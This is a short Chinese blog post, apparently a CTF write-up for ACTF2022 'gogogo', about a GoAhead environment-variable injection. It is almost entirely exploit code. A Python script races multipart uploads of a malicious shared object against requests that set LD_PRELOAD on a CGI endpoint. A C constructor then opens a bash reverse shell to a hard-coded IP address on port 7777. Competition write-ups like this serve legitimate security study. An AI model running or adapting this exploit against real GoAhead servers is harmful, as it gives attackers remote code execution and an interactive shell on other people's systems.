【ACTF2022】gogogo

看了下居然一个月没有更新博客了,赶快把最近的比赛搬出来水一水
ACTF居然在我期末周考试,然后我还要预习那些考试科目,所以阿,只做了一题,V&N的烨师傅尝试做第二题,思路有了但是没有时间做。

这一题呢主要是通过GoAhead环境变量注入
在做题之前呢,搜了下,找到了一篇相关的Vulhub漏洞复现的文章
具体的就这些
Github-exploits
exp.py

import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder
hack_so = open('hack.so','rb').read()
def upload(url):
    m = MultipartEncoder(
        fields = {
            'file':('1.txt', hack_so,'application/octet-stream')
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def include(url):
    m = MultipartEncoder(
        fields = {
            'LD_PRELOAD': '/proc/self/fd/7',
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def race(method):
    url = 'http://localhost:10218/cgi-bin/hello'
    if method == 'include':
        include(url)
    else:
        upload(url)
def main():
    task = ['upload','include'] * 1000
    random.shuffle(task) # 
    with futures.ThreadPoolExecutor(max_workers=5) as executor:
        results = list(executor.map(race, task))
if __name__ == "__main__":
    main()

hack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void aaanb(void)
{
    unsetenv("LD_PRELOAD");
    system("touch /tmp/success");
    system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
}

hack.so
github上自行提取

发布者

正汰

永远是这样,山前面是山,天空上面是天空,道路前面还是道路,迷茫之后还有迷茫。

发表回复

您的电子邮箱地址不会被公开。